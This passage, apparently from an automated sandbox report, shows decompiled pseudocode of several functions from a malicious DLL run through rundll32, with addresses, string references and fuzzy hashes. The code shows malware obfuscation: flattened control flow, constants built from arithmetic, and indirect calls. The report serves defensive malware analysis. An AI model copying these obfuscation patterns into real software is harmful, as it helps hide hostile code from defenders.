					while(_t135 != 0x3b3955f) {
						if(_t135 == 0x5c706cb) {
							E1001BC32( &_v76, _v112, _t133, _v116, _v132);
							_t160 =  &(_t160[3]);
							_t135 = 0x114bba0a;
							continue;
						} else {
							if(_t135 == 0x114bba0a) {
								_t129 = E1000D502(_t153,  &_v76, _v100, _v104, _v120);
								_t160 =  &(_t160[3]);
								__eflags = _t129;
								if(__eflags != 0) {
									_t135 = 0x3b3955f;
									continue;
								}
							} else {
								if(_t135 == 0x1d02af91) {
									_t135 = 0x5c706cb;
									continue;
								} else {
									_t167 = _t135 - 0x3aeebdd6;
									if(_t135 != 0x3aeebdd6) {
										goto L15;
									} else {
										E1001B399(_t153 + 8, _v88, _t167, _v92,  &_v76, _v124);
										_t154 =  !=  ? 1 : _t154;
									}
								}
							}
						}
						L7:
						return _t154;
					}
					_t127 = E1000D502(_t153 + 4,  &_v76, _v96, _v108, _v128);
					_t160 =  &(_t160[3]);
					__eflags = _t127;
					if(__eflags == 0) {
						_t135 = 0x1ba37112;
						goto L15;
					} else {
						_t135 = 0x3aeebdd6;
						continue;
					}
					goto L7;
					L15:
					__eflags = _t135 - 0x1ba37112;
				} while (__eflags != 0);
				goto L7;
			}

0x1000e900
0x1000e907
0x1000e90e
0x1000e910
0x1000e911
0x1000e912
0x1000e913
0x1000e918
0x1000e920
0x1000e922
0x1000e926
0x1000e929
0x1000e933
0x1000e938
0x1000e93d
0x1000e945
0x1000e94d
0x1000e955
0x1000e95d
0x1000e965
0x1000e96d
0x1000e975
0x1000e97d
0x1000e985
0x1000e98d
0x1000e995
0x1000e99d
0x1000e9a5
0x1000e9ad
0x1000e9bb
0x1000e9c0
0x1000e9c6
0x1000e9ce
0x1000e9d6
0x1000e9e2
0x1000e9e7
0x1000e9ed
0x1000e9f5
0x1000e9fd
0x1000ea05
0x1000ea0d
0x1000ea1a
0x1000ea1b
0x1000ea25
0x1000ea29
0x1000ea31
0x1000ea39
0x1000ea41
0x1000ea4e
0x1000ea52
0x1000ea5a
0x1000ea62
0x1000ea6a
0x1000ea72
0x1000ea7a
0x1000ea82
0x1000ea8a
0x1000ea97
0x1000ea9b
0x1000eaa8
0x1000eaac
0x1000eab9
0x1000eab9
0x1000eac7
0x1000eb53
0x1000eb58
0x1000eb5b
0x00000000
0x1000eac9
0x1000eacf
0x1000eb2f
0x1000eb34
0x1000eb37
0x1000eb39
0x1000eb3b
0x00000000
0x1000eb3b
0x1000ead1
0x1000ead7
0x1000eb16
0x00000000
0x1000ead9
0x1000ead9
0x1000eadf
0x00000000
0x1000eae5
0x1000eaf9
0x1000eb06
0x1000eb06
0x1000eadf
0x1000ead7
0x1000eacf
0x1000eb0a
0x1000eb15
0x1000eb15
0x1000eb78
0x1000eb7d
0x1000eb80
0x1000eb82
0x1000eb8e
0x00000000
0x1000eb84
0x1000eb84
0x00000000
0x1000eb84
0x00000000
0x1000eb93
0x1000eb93
0x1000eb93
0x00000000

Strings

e;, xrefs: 1000EA62
87, xrefs: 1000EA39

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 87$e;
API String ID: 0-2890554552
Opcode ID: f20320664dc57826dc9ba7750b836680312a2150651fd3c17f66ee3de94e0c1d
Instruction ID: 801ba0a4eb28befcfd458c0460e10e6e0716a4eb31010295eec3169aeb16a8c6
Opcode Fuzzy Hash: f20320664dc57826dc9ba7750b836680312a2150651fd3c17f66ee3de94e0c1d
Instruction Fuzzy Hash: E76188B15083829BE754CF21C88591FFBE1FBC4398F504A1DF586662A1D7B5DA08CB87

Uniqueness

Uniqueness Score: -1.00%

Function 1001D5DF, Relevance: 2.6, Strings: 2, Instructions: 115
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1001D5DF() {
				signed char _v2;
				signed int _v276;
				signed int _v280;
				char _v284;
				signed short _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _t91;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				intOrPtr _t111;

				_v332 = 0x5304d1;
				_t111 = 0;
				_t91 = 0xb4398ac;
				_v328 = 0;
				_v324 = 0;
				_v344 = 0xcc8;
				_v344 = _v344 + 0xffff8a30;
				_v344 = _v344 + 0x7862;
				_v344 = _v344 ^ 0x0000354e;
				_v348 = 0x5802;
				_v348 = _v348 << 7;
				_t107 = 0xe;
				_v348 = _v348 / _t107;
				_v348 = _v348 ^ 0x00033e82;
				_v352 = 0x83c6;
				_v352 = _v352 | 0xea30548f;
				_v352 = _v352 + 0xffff89fc;
				_v352 = _v352 | 0x2e242964;
				_v352 = _v352 ^ 0xee3425c2;
				_v336 = 0xcd64;
				_v336 = _v336 + 0xa766;
				_v336 = _v336 | 0x0a9ed305;
				_v336 = _v336 ^ 0x0a9fc311;
				_v356 = 0xa730;
				_v356 = _v356 + 0xe04a;
				_v356 = _v356 << 0xf;
				_v356 = _v356 >> 4;
				_v356 = _v356 ^ 0x0c3b8e06;
				_v340 = 0xa6a8;
				_t108 = 0x5d;
				_v340 = _v340 / _t108;
				_t109 = 0x14;
				_v340 = _v340 / _t109;
				_v340 = _v340 ^ 0x000005e4;
				do {
					while(_t91 != 0xb4398ac) {
						if(_t91 == 0xcee2968) {
							_t91 = 0x15e9ee40;
							_t111 = _t111 + _v280 * 0x3e8;
							continue;
						} else {
							if(_t91 == 0x15e9ee40) {
								_t91 = 0x1dd95313;
								_t111 = _t111 + _v276 * 0x64;
								continue;
							} else {
								if(_t91 == 0x1b0c1b95) {
									_v284 = 0x11c;
									E1001B8A2(_v344, _v348, _v352,  &_v284);
									_t91 = 0x2f41399f;
									continue;
								} else {
									if(_t91 == 0x1dd95313) {
										_t111 = _t111 + (_v320 & 0x0000ffff);
									} else {
										if(_t91 == 0x2519bf04) {
											_t91 = 0xcee2968;
											_t111 = _t111 + (_v2 & 0x000000ff) * 0x186a0;
											continue;
										} else {
											if(_t91 != 0x2f41399f) {
												goto L14;
											} else {
												E10003E53(_v336, _v356,  &_v320, _v340);
												_t91 = 0x2519bf04;
												continue;
											}
										}
									}
								}
							}
						}
						L17:
						return _t111;
					}
					_t91 = 0x1b0c1b95;
					L14:
				} while (_t91 != 0x220c6984);
				goto L17;
			}

0x1001d5e5
0x1001d5f2
0x1001d5f4
0x1001d5f9
0x1001d602
0x1001d60b
0x1001d613
0x1001d61b
0x1001d623
0x1001d62b
0x1001d633
0x1001d63f
0x1001d644
0x1001d64a
0x1001d652
0x1001d65a
0x1001d662
0x1001d66a
0x1001d672
0x1001d67a
0x1001d682
0x1001d68a
0x1001d692
0x1001d69a
0x1001d6a2
0x1001d6aa
0x1001d6af
0x1001d6b4
0x1001d6bc
0x1001d6c8
0x1001d6cd
0x1001d6d7
0x1001d6df
0x1001d6e3
0x1001d6eb
0x1001d6eb
0x1001d6fd
0x1001d7a1
0x1001d7a3
0x00000000
0x1001d703
0x1001d705
0x1001d790
0x1001d792
0x00000000
0x1001d70b
0x1001d70d
0x1001d765
0x1001d77a
0x1001d781
0x00000000
0x1001d70f
0x1001d711
0x1001d7bf
0x1001d717
0x1001d71d
0x1001d752
0x1001d75d
0x00000000
0x1001d71f
0x1001d725
0x00000000
0x1001d72b
0x1001d73c
0x1001d743
0x00000000
0x1001d743
0x1001d725
0x1001d71d
0x1001d711
0x1001d70d
0x1001d705
0x1001d7c2
0x1001d7cd
0x1001d7cd
0x1001d7aa
0x1001d7ac
0x1001d7ac
0x00000000

Strings

J, xrefs: 1001D6A2
d)$., xrefs: 1001D66A

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: J$d)$.
API String ID: 0-495709582
Opcode ID: 7ca551a060e5eb2bf7f8fe5bffec3d44243766162c9424cc1b725e71f4a1066b
Instruction ID: 4f819bcd68c606d639494f1f61624bf4d775bf76b410acb0838381fb390ae6a3
Opcode Fuzzy Hash: 7ca551a060e5eb2bf7f8fe5bffec3d44243766162c9424cc1b725e71f4a1066b
Instruction Fuzzy Hash: B441D57160C3418BD718DE15D58542FBBE5EBC4798F104A1FF4866A2A0D774CA88CB83

Uniqueness

Uniqueness Score: -1.00%

Function 100042DE, Relevance: 2.6, Strings: 2, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E100042DE(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				unsigned int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _v56;
				intOrPtr _v60;
				void* _t93;
				intOrPtr _t100;
				signed int _t103;
				void* _t109;
				intOrPtr _t111;
				intOrPtr _t117;

				_push(0x10021000);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t93);
				_v60 = 0x40bf6f;
				asm("stosd");
				asm("stosd");
				_t109 = 0x30;
				asm("stosd");
				_v12 = 0x2cad;
				_v12 = _v12 * 0x49;
				_v12 = _v12 + 0x391b;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000010d0;
				_v8 = 0x5876;
				_v8 = _v8 ^ 0x3e906a91;
				_v8 = _v8 ^ 0x5947f6a0;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x033e96e6;
				_v28 = 0xec3c;
				_v28 = _v28 << 6;
				_v28 = _v28 + 0xfefd;
				_v28 = _v28 ^ 0x003c3dc2;
				_v16 = 0xc30b;
				_v16 = _v16 * 0x5f;
				_v16 = _v16 + 0x3090;
				_v16 = _v16 + 0xffff6304;
				_v16 = _v16 ^ 0x0047aa77;
				_v32 = 0xfb03;
				_v32 = _v32 << 0xa;
				_v32 = _v32 ^ 0x03ec1c10;
				_v44 = 0x6da4;
				_v44 = _v44 + 0xffff6299;
				_v44 = _v44 ^ 0xffff8580;
				_v40 = 0x9bf7;
				_v40 = _v40 + 0xffff4c38;
				_v40 = _v40 ^ 0xffff93c5;
				_v20 = 0x8a02;
				_v20 = _v20 << 6;
				_v20 = _v20 << 0x10;
				_v20 = _v20 + 0xf383;
				_v20 = _v20 ^ 0x8080970c;
				_v36 = 0xe01f;
				_v36 = _v36 << 4;
				_v36 = _v36 ^ 0x000e4b8f;
				_v24 = 0x2ff8;
				_v24 = _v24 >> 9;
				_v24 = _v24 << 7;
				_v24 = _v24 ^ 0x00000b80;
				_t100 = E1000A0AD(_t109, __edx);
				 *0x10021fdc = _t100;
				if(_t100 == 0) {
					L7:
					return 0;
				}
				 *((intOrPtr*)(_t100 + 0x14)) = 0x10021000;
				 *((intOrPtr*)(_t100 + 0x1c)) = 0x10021000;
				_t111 =  *0x10021fdc; // 0x0
				_t117 =  *((intOrPtr*)(_t111 + 0x14));
				 *(_t111 + 0x2c) = _v24;
				_t103 =  *(_t111 + 0xc);
				while( *((intOrPtr*)(_t117 + _t103 * 8)) != 0) {
					_t103 = _t103 + 1;
					 *(_t111 + 0xc) = _t103;
				}
				if(E10012CE3(_v16, _a4, _v32) == 0) {
					E100033F4(_v44, _v40, _v20, _v36,  *0x10021fdc);
					goto L7;
				}
				return 1;
			}

0x100042eb
0x100042ec
0x100042ef
0x100042f0
0x100042f1
0x100042f6
0x10004305
0x10004308
0x10004309
0x1000430a
0x1000430b
0x10004316
0x10004319
0x10004320
0x10004324
0x1000432b
0x10004332
0x10004339
0x10004340
0x10004344
0x1000434b
0x10004352
0x10004356
0x1000435d
0x10004364
0x1000436f
0x10004372
0x10004379
0x10004380
0x10004387
0x1000438e
0x10004392
0x10004399
0x100043a0
0x100043a7
0x100043ae
0x100043b5
0x100043bc
0x100043c3
0x100043ca
0x100043ce
0x100043d2
0x100043d9
0x100043e0
0x100043e7
0x100043eb
0x100043f2
0x100043f9
0x100043fd
0x10004401
0x1000440e
0x10004413
0x1000441b
0x10004477
0x00000000
0x10004477
0x1000441d
0x10004420
0x10004426
0x1000442c
0x1000442f
0x10004432
0x1000443b
0x10004437
0x10004438
0x10004438
0x10004456
0x1000446f
0x00000000
0x10004474
0x00000000

Strings

<, xrefs: 1000434B
vX, xrefs: 1000432B

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <$vX
API String ID: 0-1268996359
Opcode ID: 136574aee8980863eb9b4d7736e63fa4db5db26dfd40ff99d6cff8e2a43d6759
Instruction ID: 0ec2c48a950258dc4b908494d4ac68eefc6c897b4ad7c4e41a8c0a313cd5caab
Opcode Fuzzy Hash: 136574aee8980863eb9b4d7736e63fa4db5db26dfd40ff99d6cff8e2a43d6759
Instruction Fuzzy Hash: 834115B5C0020AAFEB44CFA5D9495EEBBB4FF04368F208459D411B62A1D7B99B46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1000A16A, Relevance: 2.6, Strings: 2, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E1000A16A(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				void* _t84;
				intOrPtr _t86;
				intOrPtr _t95;
				signed int _t96;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t112;
				intOrPtr* _t113;
				void* _t114;
				intOrPtr _t115;

				_v4 = _v4 & 0x00000000;
				_v16 = 0x61bebf;
				_v12 = 0x289f28;
				_v8 = 0x1aa9fd;
				_v36 = 0xefe7;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 ^ 0x00003d86;
				_v24 = 0xef62;
				_v24 = _v24 + 0xffff705d;
				_v24 = _v24 ^ 0x00000dfa;
				_v44 = 0x9a92;
				_v44 = _v44 * 0x4a;
				_v44 = _v44 + 0xffff0a2a;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 ^ 0x0000384f;
				_v28 = 0x46cc;
				_v28 = _v28 | 0xddff918a;
				_v28 = _v28 ^ 0x13ff7968;
				_v28 = _v28 ^ 0xce00a3af;
				_v32 = 0x26c;
				_t96 = 0x47;
				_v32 = _v32 * 0xf;
				_v32 = _v32 + 0xd31d;
				_v32 = _v32 ^ 0x00008f1b;
				_v20 = 0x5bd8;
				_v20 = _v20 | 0xf14d6694;
				_v20 = _v20 ^ 0xf14d2a0d;
				_v40 = 0x9b36;
				_v40 = _v40 / _t96;
				_v40 = _v40 + 0xffffe86a;
				_v40 = _v40 + 0xffff5356;
				_v40 = _v40 ^ 0xffff41d1;
				_t84 = E1001072D();
				_t112 = _a4;
				_t114 = _t84;
				_v36 = 0xfa9b;
				_v36 = _v36 + 0xc985;
				_v36 = _v36 ^ 0x0001c420;
				_t116 = _t112 + 0x24;
				_t95 = E100117A2(_t112 + 0x24, _v24, _v44);
				_t86 =  *((intOrPtr*)(_t112 + 8));
				if(_t86 != _v36 && _t86 != _t114) {
					_t99 =  *((intOrPtr*)(_t112 + 0x18));
					if(_t99 != _v36 && _t99 != _t114) {
						_t113 = _a8;
						_t110 = _t95;
						_t100 =  *_t113;
						if(E100078DA(_t100, _t95) == 0) {
							_push(_t100);
							_t115 = E1000A0AD(0x220, _t110);
							if(_t115 != 0) {
								_t75 = _t115 + 0x18; // 0x18
								E1001103F(_v20, _v40, _t75, _t116);
								 *((intOrPtr*)(_t115 + 0x10)) = _t95;
								 *((intOrPtr*)(_t115 + 0xc)) =  *_t113;
								 *_t113 = _t115;
							}
						}
					}
				}
				return 1;
			}

0x1000a16d
0x1000a174
0x1000a17c
0x1000a184
0x1000a18c
0x1000a194
0x1000a199
0x1000a19e
0x1000a1a6
0x1000a1ae
0x1000a1b6
0x1000a1be
0x1000a1cd
0x1000a1d1
0x1000a1d9
0x1000a1de
0x1000a1e6
0x1000a1ee
0x1000a1f6
0x1000a1fe
0x1000a206
0x1000a215
0x1000a216
0x1000a21a
0x1000a222
0x1000a22a
0x1000a232
0x1000a23a
0x1000a242
0x1000a250
0x1000a254
0x1000a25c
0x1000a264
0x1000a270
0x1000a275
0x1000a279
0x1000a27b
0x1000a283
0x1000a28b
0x1000a29b
0x1000a2a5
0x1000a2a7
0x1000a2af
0x1000a2b5
0x1000a2bc
0x1000a2c2
0x1000a2c6
0x1000a2c8
0x1000a2d1
0x1000a2db
0x1000a2e6
0x1000a2eb
0x1000a2f1
0x1000a2fa
0x1000a2ff
0x1000a305
0x1000a309
0x1000a309
0x1000a2eb
0x1000a2d1
0x1000a2bc
0x1000a315

Strings

b, xrefs: 1000A1A6
O8, xrefs: 1000A1DE

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: O8$b
API String ID: 0-375063481
Opcode ID: 4c2a46bce24161298ed771d0f1db2b5558028cc7e7116a51708685bc93327d38
Instruction ID: c24aba3a1c61e5117759e6f7d937c07f5417c6fdf330c7fd5ef2337f408d620f
Opcode Fuzzy Hash: 4c2a46bce24161298ed771d0f1db2b5558028cc7e7116a51708685bc93327d38
Instruction Fuzzy Hash: 034105751083028FD354DF25D08581BFBE1FB95798F108A1DF4D9962A0D7B4EA898F93

Uniqueness

Uniqueness Score: -1.00%

Function 10018721, Relevance: 2.6, Strings: 2, Instructions: 99
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E10018721(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t103;
				void* _t105;
				intOrPtr* _t106;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				intOrPtr _t127;

				_v48 = 0x24b9bd;
				_t109 = 0x38;
				_t127 = _a4;
				_v44 = 0;
				_v40 = 0;
				_v28 = 0xb7ba;
				_v28 = _v28 / _t109;
				_v28 = _v28 + 0xffffb9e9;
				_v28 = _v28 ^ 0xffffd529;
				_v24 = 0xe6ce;
				_t110 = 9;
				_v24 = _v24 / _t110;
				_v24 = _v24 + 0xffff539e;
				_v24 = _v24 ^ 0xffff4d8d;
				_v12 = 0xce91;
				_v12 = _v12 << 0xa;
				_v12 = _v12 | 0x5355574c;
				_v12 = _v12 ^ 0x98864ef8;
				_v12 = _v12 ^ 0xcbf9326f;
				_v8 = 0x9d7b;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0xa8460ab3;
				_v8 = _v8 + 0xffffbda2;
				_v8 = _v8 ^ 0xa845ce74;
				_v20 = 0xd5b8;
				_v20 = _v20 >> 0xa;
				_t111 = 0x42;
				_v20 = _v20 * 0x68;
				_v20 = _v20 | 0x2fce4ec6;
				_v20 = _v20 ^ 0x2fce7351;
				_v32 = 0xce8;
				_v32 = _v32 ^ 0xe5487a01;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000e26a1;
				_v36 = 0x66ee;
				_t112 = 3;
				_v36 = _v36 / _t111;
				_v36 = _v36 ^ 0x00000476;
				_v16 = 0x33fe;
				_v16 = _v16 >> 7;
				_v16 = _v16 / _t112;
				_v16 = _v16 + 0xffff2c69;
				_v16 = _v16 ^ 0xffff751f;
				_t103 =  *((intOrPtr*)(_t127 + 4))( *((intOrPtr*)(_t127 + 0x18)), 1, 0);
				_t133 = _t103;
				if(_t103 != 0) {
					_push(0x100010ec);
					_t105 = E10003F0A(_v28, _v24, _t133);
					_t129 = _t105;
					_push(_t105);
					_push(_v8);
					_t106 = E1001A72A( *((intOrPtr*)(_t127 + 0x18)), _v12);
					if(_t106 != 0) {
						 *_t106();
					}
					E1000717B(_v20, _v32, _v36, _t129, _v16);
				}
				return 0;
			}

0x10018727
0x10018734
0x10018737
0x1001873a
0x1001873d
0x10018740
0x1001874e
0x10018753
0x1001875a
0x10018761
0x1001876b
0x10018770
0x10018775
0x1001877c
0x10018783
0x1001878a
0x1001878e
0x10018795
0x1001879c
0x100187a3
0x100187aa
0x100187ae
0x100187b5
0x100187bc
0x100187c3
0x100187ca
0x100187d2
0x100187d5
0x100187d8
0x100187df
0x100187e6
0x100187ed
0x100187f4
0x100187f8
0x100187ff
0x1001880b
0x1001880c
0x10018811
0x10018818
0x1001881f
0x10018829
0x1001882c
0x10018833
0x1001883f
0x10018842
0x10018844
0x1001884c
0x10018851
0x10018856
0x10018858
0x10018859
0x10018862
0x1001886c
0x1001886e
0x1001886e
0x1001887d
0x10018882
0x1001888c

Strings

f, xrefs: 100187FF
LWUS, xrefs: 1001878E

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: LWUS$f
API String ID: 0-4217296692
Opcode ID: 5683496678e56ef32a8d6a8e0edce8e6cd13f75ddba2a17a4957782107c5cff7
Instruction ID: c48685be728518fe1727a83ea4c7234a55737d0c234fe02e0ae40bc863bf7918
Opcode Fuzzy Hash: 5683496678e56ef32a8d6a8e0edce8e6cd13f75ddba2a17a4957782107c5cff7
Instruction Fuzzy Hash: 31412671D0031AEBEF48CFA5D84A5EEBBB6FB44310F208259D410B6294D7B95B51CF90

Uniqueness

Uniqueness Score: -1.00%

Function 100129E3, Relevance: 2.6, Strings: 2, Instructions: 93
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E100129E3(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _t115;
				void* _t117;
				intOrPtr _t119;
				signed int _t129;
				signed int _t130;
				signed int _t131;

				_v56 = _v56 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v60 = 0x57295f;
				_v24 = 0x5c5d;
				_v24 = _v24 << 7;
				_t129 = __edx;
				_v24 = _v24 * 0x74;
				_v24 = _v24 ^ 0x14ed1173;
				_v20 = 0x874f;
				_t130 = 0x7d;
				_v20 = _v20 * 0x12;
				_v20 = _v20 + 0xffff1128;
				_v20 = _v20 ^ 0x0008cd37;
				_v44 = 0x46b0;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x00000aed;
				_v40 = 0xb45a;
				_t131 = 0x55;
				_v40 = _v40 / _t130;
				_v40 = _v40 ^ 0x00007cbf;
				_v32 = 0x976d;
				_v32 = _v32 | 0xfba15c23;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x7dd0aeea;
				_v28 = 0xf204;
				_v28 = _v28 ^ 0x7d9c1629;
				_v28 = _v28 * 0x52;
				_v28 = _v28 ^ 0x3c41293a;
				_v8 = 0xde30;
				_v8 = _v8 + 0xffff3699;
				_v8 = _v8 ^ 0x13f41449;
				_v8 = _v8 << 3;
				_v8 = _v8 ^ 0x9fa07fc4;
				_v36 = 0xe75;
				_v36 = _v36 * 0x18;
				_v36 = _v36 << 0xe;
				_v36 = _v36 ^ 0x56be2d31;
				_v48 = 0x5664;
				_v48 = _v48 | 0x4938f77b;
				_v48 = _v48 ^ 0x4938ce15;
				_v16 = 0x1996;
				_v16 = _v16 >> 7;
				_v16 = _v16 / _t131;
				_v16 = _v16 * 0x5c;
				_v16 = _v16 ^ 0x00000523;
				_v12 = 0x80be;
				_v12 = _v12 << 0xf;
				_v12 = _v12 + 0xe6f2;
				_v12 = _v12 + 0xffff8588;
				_v12 = _v12 ^ 0x405f3cda;
				_push(_v40);
				_push(_v44);
				_push(_v20);
				_t115 = E100078EF(E1000B871(_t117, _v24, _v12), _v32, _v28, _v8);
				_t119 =  *0x10021404; // 0x0
				 *((intOrPtr*)(_t119 + 0x10 + _t129 * 4)) = _t115;
				return E1000717B(_v36, _v48, _v16, _t114, _v12);
			}

0x100129e9
0x100129ed
0x100129f1
0x100129f8
0x100129ff
0x10012a0b
0x10012a0f
0x10012a12
0x10012a19
0x10012a24
0x10012a27
0x10012a2a
0x10012a31
0x10012a38
0x10012a3f
0x10012a43
0x10012a4a
0x10012a56
0x10012a57
0x10012a5c
0x10012a63
0x10012a6a
0x10012a71
0x10012a74
0x10012a7b
0x10012a82
0x10012a8d
0x10012a90
0x10012a97
0x10012a9e
0x10012aa5
0x10012aac
0x10012ab0
0x10012ab7
0x10012ac2
0x10012ac5
0x10012ac9
0x10012ad0
0x10012ad7
0x10012ade
0x10012ae5
0x10012aec
0x10012af5
0x10012afc
0x10012aff
0x10012b06
0x10012b0d
0x10012b11
0x10012b18
0x10012b1f
0x10012b26
0x10012b29
0x10012b2c
0x10012b44
0x10012b4c
0x10012b56
0x10012b6d

Strings

_)W, xrefs: 100129F1
:)A<, xrefs: 10012A90

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: :)A<$_)W
API String ID: 0-1915120261
Opcode ID: e1ca8145bf0fbafbd37098344b970b7cdf5d8452672bf153a8981dd77ebe333a
Instruction ID: a4f2e6404b6904d5794f0d6e296ac5b8c86a1f6f4cfbe1657a70b0d54baaec6b
Opcode Fuzzy Hash: e1ca8145bf0fbafbd37098344b970b7cdf5d8452672bf153a8981dd77ebe333a
Instruction Fuzzy Hash: 58411F71C00219EBDF04CFA5C94A8EEFFB1FB08318F208159D525BA2A0C7B94A45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 10003743, Relevance: 1.4, Strings: 1, Instructions: 103
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E10003743(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v304;
				char _t95;
				signed int _t99;
				void* _t102;
				signed int _t104;
				signed int _t105;
				char* _t106;
				intOrPtr* _t120;
				void* _t121;

				_t120 = __ecx;
				_v32 = 0x6555;
				_v32 = _v32 << 1;
				_v32 = _v32 + 0xf34d;
				_v32 = _v32 ^ 0x0001bcdd;
				_v24 = 0x14df;
				_v24 = _v24 | 0x3542672c;
				_v24 = _v24 + 0xffff2079;
				_v24 = _v24 ^ 0x3541bbe5;
				_v8 = 0x70d7;
				_v8 = _v8 ^ 0x99a67966;
				_v8 = _v8 + 0xffff62ac;
				_v8 = _v8 ^ 0x1f0c2db0;
				_v8 = _v8 ^ 0x86a9391d;
				_v36 = 0xb5e3;
				_v36 = _v36 + 0xffff89c0;
				_v36 = _v36 ^ 0x00007bd1;
				_v12 = 0xa849;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0xb7ed89e0;
				_v12 = _v12 >> 0x10;
				_v12 = _v12 ^ 0x000082f0;
				_v44 = 0xb8cc;
				_v44 = _v44 ^ 0x76a8a33d;
				_v44 = _v44 ^ 0x76a834f1;
				_v28 = 0x7f4e;
				_v28 = _v28 + 0xb5c3;
				_t104 = 0x7e;
				_v28 = _v28 / _t104;
				_v28 = _v28 ^ 0x000016e7;
				_v40 = 0x9d3a;
				_v40 = _v40 + 0xffffbb74;
				_v40 = _v40 ^ 0x00006bc1;
				_v20 = 0x4f51;
				_v20 = _v20 | 0xaa5831da;
				_v20 = _v20 ^ 0x80e93698;
				_v20 = _v20 ^ 0x2ab10c44;
				_v16 = 0x5597;
				_t105 = 0x3c;
				_t106 =  &_v304;
				_v16 = _v16 / _t105;
				_v16 = _v16 ^ 0xf4afa0ec;
				_v16 = _v16 ^ 0xf4af8843;
				while(1) {
					_t95 =  *_t120;
					if(_t95 == 0) {
						break;
					}
					if(_t95 == 0x2e) {
						 *_t106 = 0;
					} else {
						 *_t106 = _t95;
						_t106 = _t106 + 1;
						_t120 = _t120 + 1;
						continue;
					}
					L6:
					_t121 = E1000E690(_v32, _v24, _v8, _v36,  &_v304);
					if(_t121 != 0) {
						L8:
						_t99 = E1000B79B(_v28, _v40, _t120 + 1);
						_push(_t121);
						_push(_t99 ^ 0x5f013404);
						return E10008203(_v20, _v16);
					}
					_t102 = E100070C5(_v12,  &_v304, _v44);
					_t121 = _t102;
					if(_t121 != 0) {
						goto L8;
					}
					return _t102;
				}
				goto L6;
			}

0x1000374e
0x10003750
0x10003759
0x1000375c
0x10003763
0x1000376a
0x10003771
0x10003778
